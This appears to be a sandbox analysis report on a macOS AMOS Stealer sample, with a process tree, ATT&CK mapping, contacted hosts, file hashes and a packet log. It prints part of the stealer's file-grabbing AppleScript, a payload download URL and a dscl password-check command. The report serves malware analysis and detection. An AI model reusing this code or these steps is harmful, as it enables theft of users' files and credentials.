Source: /usr/bin/xattr (PID: 618) Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/osascript (PID: 624) Binary plist file created: /private/var/root/Library/Saved Application State/com.apple.osascript.savedState/windows.plist
Source: /usr/bin/osascript (PID: 624) Reads from a resource fork: /usr/bin/osascript/..namedfork/rsrc
Source: /usr/sbin/system_profiler (PID: 629) Sysctl read request: hw.model (6.2)

HIPS / PFW / Operating System Protection Evasion

Source: /usr/sbin/system_profiler (PID: 627) Csrutil executable: /usr/bin/csrutil /usr/bin/csrutil status
Source: /usr/bin/osascript (PID: 624) Sysctl read request: kern.safeboot (1.66)
Source: /usr/sbin/system_profiler (PID: 627) Sysctl read request: kern.safeboot (1.66)
Source: /usr/bin/osascript (PID: 624) Sysctl read request: hw.availcpu (6.25)
Source: /usr/sbin/system_profiler (PID: 629) Sysctl read request: hw.cpu_freq (6.15)
Source: /usr/sbin/system_profiler (PID: 629) Sysctl read request: hw.memsize (6.24)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618) Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618) Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/osascript (PID: 624) Sysctl requested: kern.ostype (1.1)
Source: /usr/bin/osascript (PID: 624) Sysctl requested: kern.osrelease (1.2)
Source: /usr/sbin/system_profiler (PID: 627) Sysctl requested: kern.ostype (1.1)
Source: /usr/sbin/system_profiler (PID: 627) Sysctl requested: kern.osrelease (1.2)
Source: /bin/sh (PID: 615) Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 621) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 623) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/osascript (PID: 624) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 625) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 626) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 631) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 632) Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 618) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 624) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/sbin/system_profiler (PID: 627) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Stealing of Sensitive Information

Source: /bin/sh (PID: 624)AMOS Stealer Osscript: osascript -e set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifreturn 
falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exceptions
Source: /bin/sh (PID: 632) Security executable: /usr/bin/dscl dscl . authonly root
Source: /bin/sh (PID: 626) System_profiler executable: /usr/sbin/system_profiler system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
Source: /usr/sbin/system_profiler (PID: 626) System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPSoftwareDataType -detailLevel full
Source: /usr/sbin/system_profiler (PID: 626) System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full
Source: /usr/sbin/system_profiler (PID: 626) System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPDisplaysDataType -detailLevel full
MITRE ATT&CK Matrix (listed per tactic column; the numbers are the counts the report attaches to each technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: 13 AppleScript; 1 Malicious File; At; Cron
Persistence: 1 Scripting; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Defense Evasion: 1 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 1 File and Directory Permissions Modification; 1 Hidden Files and Directories
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: 1 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Account Discovery; 161 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol
Exfiltration: 1 Exfiltration Over Alternative Protocol; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
Behavior Graph (ID: 1594700, Cookbook: defaultmaccmdlinecookbook.jbs, Startdate: 19/01/2025, Architecture: MAC, Score: 60)

Network: norikosumiya.com (81.19.135.228, port 443, IVC-ASRU, Russian Federation); 151.101.131.6 (port 443, FASTLYUS, United States); 3 other IPs or domains.

Process tree: sh (under mono-sgen32) starts update, curl, xattr/Python and chmod; curl drops /private/tmp/update (Mach-O). update starts two sh children: one runs osascript (signatures: Detected AMOS Stealer; Executes Apple scripts with very long statement arguments), the other runs pkill. osascript starts sh -> system_profiler (which starts three further system_profiler processes and csrutil; signature: Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration), sh -> dscl (signature: Executes the "dscl" command with authonly argument (probably to verify the login password)), sh -> mkdir, and a further sh. Also started via xpcproxy: nsurlstoraged, dirhelper, eficheck.

No Antivirus matches
Source: https://norikosumiya.com/brew/update | Detection: 0% | Scanner: Avira URL Cloud | Label: safe


Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
norikosumiya.com | 81.19.135.228 | true | false | | unknown
gateway.fe2.apple-dns.net | 17.248.228.69 | true | false | | high
h3.apis.apple.map.fastly.net | 151.101.3.6 | true | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://norikosumiya.com/brew/update | false | Avira URL Cloud: safe | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
81.19.135.228 | norikosumiya.com | Russian Federation | 24658 | IVC-ASRU | false
151.101.3.6 | h3.apis.apple.map.fastly.net | United States | 54113 | FASTLYUS | false
23.55.204.208 | unknown | United States | 16625 | AKAMAI-ASUS | false
151.101.131.6 | unknown | United States | 54113 | FASTLYUS | false
151.101.67.6 | unknown | United States | 54113 | FASTLYUS | false
                                                                      • 81.19.135.228
                                                                      extracted-pkg.ziphttps://fluencydirect-distro.s3.amazonaws.com/releases.macOS/FluencyDirect-11.0.10.40.pkgGet hashmaliciousUnknownBrowse
                                                                      • 81.19.135.228
                                                                      Aunteficator-installer-1it5dZOj.pkgGet hashmaliciousUnknownBrowse
                                                                      • 81.19.135.228
                                                                      MacKeeper.6.7.1.pkgGet hashmaliciousUnknownBrowse
                                                                      • 81.19.135.228
                                                                      No context
                                                                      Process:/usr/bin/osascript
                                                                      File Type:ASCII text, with CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1369
                                                                      Entropy (8bit):4.727898989684138
                                                                      Encrypted:false
                                                                      SSDEEP:24:MBjohBas4ET1S2GMi1f1k2t26GwBenwRrzeMdQxLI9dIZoTC1cWB6:wSB8ETE5M2k2t2QBenwt6MgLI9dmW8k
                                                                      MD5:0DE6D6FB609F0B0ED4A39BB3FEF8B9E8
                                                                      SHA1:5CEF29DC95DCC010D7797DE7780DEF625BC031C2
                                                                      SHA-256:A80CC94745540269B939142BDF0683AB004CAD98281E1921A9F6AC603386F6A5
                                                                      SHA-512:1D0F777A2AF019FE8D48F2F1BC3821F2AD9CF51747E4470CB801FCBAB3E479423565C83CEEB86A43928C2F56F506EE13913D16F237F47686EFB0DEC25827D4F2
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:Software:.. System Software Overview:.. System Version: macOS 10.14.2 (18C54). Kernel Version: Darwin 18.2.0. Boot Volume: Macintosh HD. Boot Mode: Normal. Computer Name: mojave. User Name: System Administrator (root). Secure Virtual Memory: Enabled. System Integrity Protection: Disabled. Time since boot: 2 minutes..Hardware:.. Hardware Overview:.. Model Name: Mac mini. Model Identifier: Macmini8,1. Processor Speed: 3.01 GHz. Number of Processors: 1. Total Number of Cores: 2. L2 Cache (per Core): 256 KB. L3 Cache: 18 MB. Memory: 4 GB. Boot ROM Version: VirtualBox. Apple ROM Info: vboxVer_7.0.12vboxRev_159484. SMC Version (system): 2.3f35. Serial Number (system): 0. Hardware UUID: 6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2..Graphics/Displays:.. Display:.. Type: GPU. VRAM (Total): 3 MB. VRAM (Dynamic, Max): . Device ID: 0xbeef. Revision ID: 0x0000.
                                                                      Process:/usr/bin/curl
                                                                      File Type:Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|WEAK_DEFINES|BINDS_TO_WEAK|PIE>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>]
                                                                      Category:dropped
                                                                      Size (bytes):234656
                                                                      Entropy (8bit):3.081958215032428
                                                                      Encrypted:false
                                                                      SSDEEP:1536:0JbsXk/YEDMSm/LW7z0y32sUV5296lzQfdEp76lxu5h3c0lddl3OzQOgZAW0oZuE:Gg7SVQHfd
                                                                      MD5:0418181CAABA4686FAE772B60D9A2C62
                                                                      SHA1:80B98D4816114177FC9361B107E87AFA33D71F64
                                                                      SHA-256:F48CF1B5AD2435FEA9FDB7F7D2774BACCA8C506E4AB9BAA4B95174A40ADE0515
                                                                      SHA-512:D094A9FA0A805F3E3BDB543E42906C11A6F0E60A563782B7AFDF0B26076D53BE3AC1DEA535847AC479F183BE83F6E246743780417A556F01F220E7398D476F8E
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..................@...Up...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:/usr/bin/osascript
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1248
                                                                      Entropy (8bit):7.8505293694080605
                                                                      Encrypted:false
                                                                      SSDEEP:24:iesJE6ku40tgwyOxo9TRQK2Ju2oeLXbi1mDgfMkisqDUwmmzVwYHk:PODz4Eo98J6OXbXDEqTfjE
                                                                      MD5:0090043DD2DAE918F77147763D238E6B
                                                                      SHA1:980074431A801043A8A0708C93C8190516E7FEA5
                                                                      SHA-256:3A8A7A0DE75BDEF4F575F5E1A4802BDB460301E5040CDF377D6E29DE304D542A
                                                                      SHA-512:0D1724143514B043B89735E9635CB8988A6DB37FFFBC9684F65F0F71551CE7B0813DFE49C36779435E38A15D249ED50902118A028F6CBAE0CF8F877D835175E8
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:NSCR1000...........{.u.2..H.u...)...b.....XvM%. ...o/.j..8V_*.oZ;:F.).......0s5,.8.dD;m./.w.=(Q.h}%q.3g..1qU..*......_:'Oi<..(_...f...VL].Y............p...PC.Q7.|F}h`..qJ.<..7.*...?..?R=.<..Pn..T...w...(D\..~)..|..gi.Eo....9#.j5E.....e.Z....m..x...|W....k.T.NQ-..v....~.<Z!..xISh'x.i..NA../.m.M..h..^.[.S'._..S...%)........s.N&....i.V.../.._....LI>.....B.....N....^.{...1.I....*.&.7....vZ....{)....'.n...*@..Htu..}..J..J.5....z.....9.~...[...J....."X;D.&6...T4.e.-2.9.h!..,.Pt.E{.e.._....8.Y....$...V..F..._..Y.2.D.Va..@..E.2.m.w=1...e...b.........|:.p....n......g.......B..}..dC%.>.0p.....8.P9.....A...w.0w....X.3.=/....$)i....Z..>.l..rJ..;..N%.b.`...!........8.W...O8...u.q....X..>.8m.&f...u..K.....eU\1h.....L:i!D<..e...8...R...1.u.X."...{/L.F<..aT.C.....D.h3IB...@...+..l^...L.#<.P..@l..A..2....{..5^e.f......V...wJ. R......d&.^.%.....".u.sA.:..Q*.rX..(\....Y.yq.U3hM......o.hU...'.RnU..G.FW.P.....0...t.p.=....NSCR1000....... ..).vP.A..1%K....G.y.AYS
                                                                      Process:/usr/bin/osascript
                                                                      File Type:Apple binary property list
                                                                      Category:dropped
                                                                      Size (bytes):828
                                                                      Entropy (8bit):6.1614055634278815
                                                                      Encrypted:false
                                                                      SSDEEP:12:Qq10XGnLxGArG7u4Q3Vfged3bjaaFApp/DB+AkKEkXTfuC4G3O1cPHWXh:/+SLkP7uTgWCoADDFkTgTm1G3OcH2h
                                                                      MD5:B6B9147CD7843341520DF3842CDAE086
                                                                      SHA1:E14B025F3866CA6C3DC226F75EDCE6EAB30CB936
                                                                      SHA-256:5278E0EBB68CE65E23FB9D950707BC9F103A5F89EE9CF131BAEB45BFF382EB60
                                                                      SHA-512:F83868E8BA36DD26597F699DCF78E983EDC6BDF58988885CFF11AD8F246FF23051B202634470410B07FD28B41567A558FE2522EE25296DF08CC2557857461225
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:bplist00........................\NSDragRegionZNSWindowIDYNSDataKey_..NSUIPersistenceIsKey^NSWindowNumber]NSWindowLevel]NSWindowFrame_..NSIsAuxiliaryFullScreenWNSTitle_..NSWindowWorkspaceIDO.$......................................O..9..a.......%M*...<.._..302 439 420 175 0 0 1024 745 ._..System PreferencesP............#$%^NSWindowZOrderZNSIsGlobal_..NSSystemVersion_..NSSystemAppearance_..NSExecutableInode..O..aNL............ !"......O...bplist00.........X$versionX$objectsY$archiverT$top..........U$null.....V$class_..NSAppearanceName...._..NSAppearanceNameDarkAqua.....Z$classnameX$classes\NSAppearance...XNSObject_..NSKeyedArchiver...Troot.....#-27<BGNace............................................................. .-.8.B.Y.h.v.........................3.4.C.R.].o.....................................&................
                                                                      No static file info

Download Network PCAP: filtered, full

• Total Packets: 274
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 19, 2025 20:31:46.743108034 CET  443          49349      151.101.3.6      192.168.11.12
Jan 19, 2025 20:31:46.745204926 CET  443          49349      151.101.3.6      192.168.11.12
Jan 19, 2025 20:31:46.745325089 CET  443          49349      151.101.3.6      192.168.11.12
Jan 19, 2025 20:31:46.745444059 CET  443          49349      151.101.3.6      192.168.11.12
Jan 19, 2025 20:31:46.745567083 CET  443          49349      151.101.3.6      192.168.11.12
Jan 19, 2025 20:31:46.745598078 CET  443          49349      151.101.3.6      192.168.11.12
Jan 19, 2025 20:31:46.745826960 CET  49349        443        192.168.11.12    151.101.3.6
Jan 19, 2025 20:31:46.746073961 CET  49349        443        192.168.11.12    151.101.3.6
Jan 19, 2025 20:31:46.746164083 CET  49349        443        192.168.11.12    151.101.3.6
Jan 19, 2025 20:31:46.746164083 CET  49349        443        192.168.11.12    151.101.3.6
Jan 19, 2025 20:31:46.754494905 CET  49349        443        192.168.11.12    151.101.3.6
Jan 19, 2025 20:31:46.825908899 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:46.936079979 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:46.937098026 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:46.940270901 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.050602913 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.050987959 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.051050901 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.051085949 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.051878929 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.051878929 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.051969051 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.123857021 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.234397888 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.234437943 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.236011028 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.236011028 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.263755083 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.265021086 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.265091896 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.265213013 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.266432047 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.374924898 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.374934912 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.375171900 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.375910997 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.376029015 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.376147985 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.376224995 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.376662016 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.377104044 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.377181053 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.377181053 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.377507925 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.383763075 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.383882999 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.385267019 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.385540009 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.391485929 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.391606092 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.392925024 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.393263102 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.399297953 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.399416924 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.400726080 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.401050091 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.407049894 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.407150984 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.407769918 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.407857895 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.414866924 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.414969921 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.415505886 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.416012049 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.486597061 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.486697912 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.487411022 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.487631083 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.490521908 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.490622997 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.491204977 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.491295099 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.498325109 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.498425007 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.498982906 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.499213934 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:47.506140947 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.506150007 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:47.506793976 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:48.003336906 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:48.113342047 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:49.202847004 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:49.206129074 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:49.312990904 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:49.313683987 CET  49350        443        192.168.11.12    17.248.228.69
Jan 19, 2025 20:31:49.316145897 CET  443          49350      17.248.228.69    192.168.11.12
Jan 19, 2025 20:31:50.803257942 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:50.803298950 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:50.804169893 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:50.822926998 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:50.822957993 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:51.322071075 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:51.324100018 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:51.324166059 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:51.440474987 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:51.440509081 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:51.440788984 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:51.441629887 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:51.442058086 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:51.482445002 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:51.999470949 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:51.999558926 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:51.999650002 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.003372908 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.003467083 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.003510952 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.003804922 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.003891945 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.003936052 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.004215956 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.004296064 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.004338026 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.004636049 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.006057978 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.006120920 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.006264925 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.006360054 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.006478071 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.006609917 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.006948948 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.007690907 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.008239985 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.009274006 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.009655952 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.232913971 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.232937098 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.233007908 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.236924887 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.236984968 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.237206936 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.237623930 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.237683058 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.237871885 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.237940073 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.238307953 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.238364935 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.238516092 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.238693953 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.238749981 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.238787889 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.238897085 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.238925934 CET  443          49356      81.19.135.228    192.168.11.12
Jan 19, 2025 20:31:52.239022970 CET  49356        443        192.168.11.12    81.19.135.228
Jan 19, 2025 20:31:52.239034891 CET  443          49356      81.19.135.228    192.168.11.12
                                                                      Jan 19, 2025 20:31:52.239481926 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.239634037 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.239936113 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.239936113 CET49356443192.168.11.1281.19.135.228
